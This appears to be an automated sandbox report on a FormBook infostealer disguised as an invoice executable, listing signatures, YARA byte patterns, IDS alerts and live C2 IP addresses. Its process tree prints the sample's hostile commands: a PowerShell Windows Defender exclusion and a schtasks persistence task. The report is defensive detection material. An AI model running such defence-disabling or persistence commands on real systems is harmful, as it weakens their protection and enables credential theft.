Windows Analysis Report
z1SupplyInvoiceCM60916_Doc.exe

Overview

General Information

Sample name: z1SupplyInvoiceCM60916_Doc.exe
Analysis ID: 1527933
MD5: a903c6fb836f2c2c2762d1fde269bdb8
SHA1: 951db6eeeef69c89d7096ba54aa8c4a95273b9a4
SHA256: bbd7ba6f8ae2b651eeb05135ba638a2de431be9c9a8b347621391b733c95f865
Tags: exe, Formbook, user-Porcupine

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SIDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • z1SupplyInvoiceCM60916_Doc.exe (PID: 3840 cmdline: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe" MD5: A903C6FB836F2C2C2762D1FDE269BDB8)
    • powershell.exe (PID: 6684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 672 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4088 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • z1SupplyInvoiceCM60916_Doc.exe (PID: 6116 cmdline: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe" MD5: A903C6FB836F2C2C2762D1FDE269BDB8)
      • IEFVDUdSaLLhw.exe (PID: 1460 cmdline: "C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • svchost.exe (PID: 6688 cmdline: "C:\Windows\SysWOW64\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • firefox.exe (PID: 3048 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • dpqsbGoWdXlp.exe (PID: 1708 cmdline: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe MD5: A903C6FB836F2C2C2762D1FDE269BDB8)
    • schtasks.exe (PID: 4508 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dpqsbGoWdXlp.exe (PID: 5676 cmdline: "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe" MD5: A903C6FB836F2C2C2762D1FDE269BDB8)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f333:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2be50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
        Source | Rule | Description | Author | Strings
        11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
        11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
          • 0x2f333:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
        11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
          • 0x2e533:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16682:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ParentImage: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe, ParentProcessId: 3840, ParentProcessName: z1SupplyInvoiceCM60916_Doc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ProcessId: 6684, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe, ParentImage: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe, ParentProcessId: 1708, ParentProcessName: dpqsbGoWdXlp.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp", ProcessId: 4508, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ParentImage: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe, ParentProcessId: 3840, ParentProcessName: z1SupplyInvoiceCM60916_Doc.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp", ProcessId: 4088, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\svchost.exe", CommandLine: "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe" , ParentImage: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe, ParentProcessId: 1460, ParentProcessName: IEFVDUdSaLLhw.exe, ProcessCommandLine: "C:\Windows\SysWOW64\svchost.exe", ProcessId: 6688, ProcessName: svchost.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ParentImage: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe, ParentProcessId: 3840, ParentProcessName: z1SupplyInvoiceCM60916_Doc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ProcessId: 6684, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\SysWOW64\svchost.exe", CommandLine: "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe" , ParentImage: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe, ParentProcessId: 1460, ParentProcessName: IEFVDUdSaLLhw.exe, ProcessCommandLine: "C:\Windows\SysWOW64\svchost.exe", ProcessId: 6688, ProcessName: svchost.exe

            Persistence and Installation Behavior

            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ParentImage: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe, ParentProcessId: 3840, ParentProcessName: z1SupplyInvoiceCM60916_Doc.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp", ProcessId: 4088, ProcessName: schtasks.exe

            AV Detection

            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe, ReversingLabs: Detection: 47%
            Source: z1SupplyInvoiceCM60916_Doc.exe, ReversingLabs: Detection: 47%
            Source: Yara match, File source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: z1SupplyInvoiceCM60916_Doc.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: z1SupplyInvoiceCM60916_Doc.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: paDa.pdbSHA256 source: z1SupplyInvoiceCM60916_Doc.exe, dpqsbGoWdXlp.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IEFVDUdSaLLhw.exe, 0000000D.00000000.2215877606.0000000000B2E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2301632908.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2299969271.0000000003100000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: z1SupplyInvoiceCM60916_Doc.exe, z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2301632908.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2299969271.0000000003100000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: paDa.pdb source: z1SupplyInvoiceCM60916_Doc.exe, dpqsbGoWdXlp.exe.0.dr
            Source: Binary string: svchost.pdb source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300268708.0000000001177000.00000004.00000020.00020000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000003.2375679084.0000000000A49000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300268708.0000000001177000.00000004.00000020.00020000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000003.2375679084.0000000000A49000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 15_2_007CC3A0 FindFirstFileW,FindNextFileW,FindClose (15_2_007CC3A0)
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe, Code function: 4x nop then xor esi, esi (11_2_00418575)
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe, Code function: 4x nop then xor esi, esi (11_2_0041850B)
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then xor eax, eax (15_2_007B9BC0)
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop edi (15_2_007D24D9)
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then xor esi, esi (15_2_007C5028)
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then xor esi, esi (15_2_007C509C)
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop edi (15_2_007BDF0F)
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then mov ebx, 00000004h (15_2_034004E8)

            Networking

            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49864 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49969 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49994 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49994 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49864 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 104.21.5.125:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 104.21.5.125:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50000 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 162.0.215.33:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 119.18.54.27:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50034 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 104.21.5.125:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 119.18.54.27:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50026 -> 209.74.64.190:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50026 -> 209.74.64.190:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50013 -> 161.97.168.245:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50013 -> 161.97.168.245:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 161.97.168.245:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50045 -> 8.217.17.192:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50034 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 209.74.64.190:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50004 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50009 -> 162.0.215.33:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50009 -> 162.0.215.33:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50038 -> 38.55.251.233:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50040 -> 162.0.215.33:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50038 -> 38.55.251.233:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50017 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 209.74.64.190:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50022 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50022 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50017 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 38.55.251.233:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50047 -> 8.217.17.192:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50047 -> 8.217.17.192:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49999 -> 104.21.5.125:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 104.21.5.125:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 68.178.233.113:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50035 -> 38.55.251.233:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 161.97.168.245:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 162.0.215.33:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 68.178.233.113:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50042 -> 162.0.215.33:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50046 -> 8.217.17.192:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50024 -> 209.74.64.190:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50044 -> 8.217.17.192:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 162.0.215.33:80
